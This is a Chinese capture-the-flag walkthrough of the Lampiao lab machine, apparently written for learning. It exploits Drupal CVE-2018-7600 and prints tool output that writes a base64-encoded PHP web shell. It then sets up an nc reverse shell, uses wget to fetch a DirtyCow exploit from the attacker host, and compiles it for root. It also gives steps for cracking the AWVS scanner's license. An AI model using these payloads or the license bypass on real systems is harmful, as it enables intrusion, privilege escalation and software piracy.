2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

这篇具有很好参考价值的文章主要介绍了2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。


前言

前言:

我们上个笔记是常规收集可用信息,爆破拿到ssh账户提权得到root的shell

这次我们用框架来尝试两种不同方法拿到shell

思路清晰,先说步骤

1.信息收集得到可以用的站点漏洞

2.通过AWVS+xray或xray和bs解析出目录报告,得到我们能利用exp或poc,当然因为AWVS爬虫功能并不免费,所以最好联动,也可以和其他工具联动,思想是自动化的思想,得到可以利用的框架漏洞。

3.得到可以用的poc或exp直接利用提权,如果又cve更好。


一、环境重新部署

前面我们从robots.txt拿到的框架搜索一下

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2drupal 7.54

谷歌老师
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
我们把靶机移到和我windows一样的网段,我用kali扫描他
靶机ip
192.168.198.135

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2


二、AWVS+xray联动和xray+bs联动

1.安装AWVS+xray

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
点这个安装
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
无脑下一步就好了

复制wvsc.exe到“C:\Program Files (x86)\Acunetix\13.0.200205121\”下覆盖同名文件
(这里的路径是自己awvs选择的下载安装路径)

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
把认证文件替换了
复制license_info.json到“C:\ProgramData\Acunetix\shared\license”下覆盖同名文件
(这个的路径都一样)

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2直接运行
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2安装xray

解压、运行acunetix_13.0.200205121.exe安装
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用22-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

2.让xray和bs先联动

先了解一下xray命令
如果想要进行单个网页简单的扫描

.\xray_windows_amd64.exe webscan --url http://192.168.198.135:1898/ --html-output single-url.html

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

因为如果我们想要单个界面逐个测试,同时验证漏洞是否可执行,那么就需要 BS作为中间人,把数据传到 Xray , 我们就可以根据 Xray 给的漏洞提示结合 BS 进行漏洞可行性测试

打开 BS , 设置代理,此操作是为了向 Xray 传输数据

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
接着我们向 Xray 设置监听,用来接收BS收到的数据

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output test.html

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2我们下载bs做中间人攻击代理,把包转发给xray
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2我们发数据包过去
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
xray跑出来了很多信息
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

我们目前是网页—》bs—》xray
我们还需要和AWVS和xray联动

3.AWVS和xray联动

如果我想利用社区版 Xray 进行爬虫爆破子域名或者各种文件后缀,不好意思,这些功能得付费才能使用
但是我们又知道 AWVS 的爬虫功能又很厉害,那么我们能不能将二者结合起来呢?

打开 AWVS
默认进入网站是 127.0.0.1:3443 ,前提是你没有修改端口
添加一个target
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
点击save
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
为 AWVS 设置代理

上一步点击代理后,就会跳到另一个界面

划到底部就会看见 HTTP

点击 Proxy Server 就会展开
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
先点save,再点scan
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
如果没有特殊要求点击 Create Scan 即可
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2联动了
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

三、poc利用

通过AWVS+xray跑出了

poc:poc-yaml-drupal-cve-2018-7600-rce

那么Xray是给出了两篇poc的文章:
https://github.com/dreadlocked/Drupalgeddon2
https://paper.seebug.org/567/

用法:
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

wget clone https://github.com/dreadlocked/Drupalgeddon2.git
./drupalgeddon2.rb http://192.168.198.135:1898/

报错了
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2要安装模块

sudo gem install highline

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2通过poc发现对方是7.x的drupal版本漏洞,通过base64方法上传shell.php成功获得shell
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
上传一句话木马 连马

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.198.135:1898/
--------------------------------------------------------------------------------
[+] Found  : http://192.168.198.135:1898/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo IXTDUTSD
[+] Result : IXTDUTSD
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://192.168.198.135:1898/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://192.168.198.135:1898/shell.php' -d 'c=hostname'

然后该shell是无法执行g++命令的

我将python进行反弹shell到本地nc交互:

kali开启nc监听

nc -vlp 6666

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
靶机有python执行远控,主动连接

这里的python 的socket远控代码大家私信我,我直接发出来不太好。。。。

反弹shell
bash的shell

python -c 'import pty; pty.spawn("/bin/bash")'

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
kali网页开启http
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
靶机wget

wget http://192.168.198.133:8000/40847.cpp

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
提权
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
flag
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

四、msf的cve利用(姿势3)

这个姿势我们用框架的cve渗透靶机
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2查看要配置的参数

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2run攻击playload
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
这里提权步骤有些问题

因为wget在这里用不了,我们可以用其他方式上传文件
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
这是一个伪shell
不会回显信息
我们要获取tty

python -c 'import pty; pty.spawn("/bin/bash")'

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2尝试提权
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o muma 40847.cpp -lutil

2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
提权不了,这里是因为主动连接的问题,还是需要让靶机主动连接我们

远控木马不能发,私信我,谅解一下

nc连接
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
提权

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

flag
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2


总结

上面就是对于框架渗透的wp了,希望大家能学到这个方法论,喜欢的可以点个赞。
特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。文章来源地址https://www.toymoban.com/news/detail-434578.html

到了这里,关于2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Lampiao靶场-dirtycow漏洞利用

    目录 Lampiao靶场-dirtycow漏洞利用 一、主机发现 二、端口扫描 三、目录遍历 四、拿到webshell 五、实现交互式shell 六、暴力破解 七、把dirtycow脚本传到靶机 八、编译运行dirtycow脚本 只是简单记录一下所用工具 机器信息: 靶机:192.168.142.132 攻击机:192.168.142.133 nmap -sP 192.168.14

    2023年04月11日
    浏览(41)
  • 【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)

    Vulnhub百个项目渗透——项目五十六:sp-jerome(文件上传,缓冲区溢出) 🔥系列专栏:Vulnhub百个项目渗透 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2023年1月20日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢! 本文章仅用作实验学习,实验环境均为

    2024年02月01日
    浏览(48)
  • Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现

    Kali版本:2022.3 目标主机ip:192.168.186.148 攻击机ip:192.168.186.147 vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式 登陆界面如下,此时账户密码未知

    2024年01月21日
    浏览(42)
  • PWNlab靶机渗透

    安装靶机 下载地址:https://www/vulnhub.com/entry/pwnlab-init,158/ 收集靶机ip地址,由于搭建在本地使用kali自带命令 arp-scan -l nmap 扫描端口,服务 nmap -sV -p 1-65535 -A 靶机ip地址   访问80端口地址,查找可利用的功能点 发现存在upload,不过需要登录 发现一个规律每次切换网页时,存在p

    2024年02月13日
    浏览(31)
  • 渗透测试 靶机环境下载

    实验环境 下载微软软件: Sign in to your account http://msdn.microsoft.com/en-ca/subscriptions/aa336858 下载实验所需Windows虚拟机: Virtual Machines - Microsoft Edge Developer Download free virtual machines to test Microsoft Edge and IE8 to IE11 https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 下载Linux应用程序虚拟机

    2024年02月09日
    浏览(39)
  • DarkHole_1靶机渗透流程

    注意:部署时,靶机的网络连接模式必须和kali一致,让靶机跟kali处于同一网段,这用kali才能扫出靶机的主机 1.1 探测IP 使用nmap扫描同一个段下存活的IP 发现192.168.157.138开放了80端口,访问后确认为此次渗透的靶机 1.2 详细信息扫描 -A:启用操作系统探测与版本检测、脚本扫描

    2024年02月06日
    浏览(41)
  • 靶机渗透(五)——metasploitable2

    metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 : msfadmin 密码是: msfadmin 开放了好多端口 大致过程 在kali中执行msfconsole,启动metasploit search irc,选择模块

    2024年02月05日
    浏览(55)
  • VulnHub靶机渗透:SKYTOWER: 1

    https://www.vulnhub.com/entry/skytower-1,96/ 靶机IP:192.168.56.101 kali IP:192.168.56.102 发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。 日常,先目录爆破 在目录爆破的过程中查看网页内容。 发现登录框,尝试万能密码。(这里用户和密码一样) 报错了,错误信息为 从这

    2024年02月10日
    浏览(86)
  • 内网渗透代理知识以及渗透某CTF三层靶机实例

            在学习完小迪内网代理安全知识后,自己也找来了案例中的CTF比赛中三层靶机,来总结一下内网代理知识。实验中成功拿到三个flag,话不多说,现在就开始。 文章目录 前言 一、 内网代理知识 二 、CTF三层靶机实例 1. 靶机拓补图 2. 攻击目标1 3.添加路由 4.开启代

    2024年02月03日
    浏览(40)
  • DC-6靶机测试渗透详细教程

    1、首先扫描我们要渗透机器的IP 2、 接着我们扫描IP的端口和操作系统  我们扫到目标机的80端口开启了,我们进行查看目标机的80端口。(我做过实验,所以不可以直接访问)因此我们需要进行给靶机的IP和域名进行绑定,然后再进行访问      发现没有任何注入点 3、接着我

    2024年02月17日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包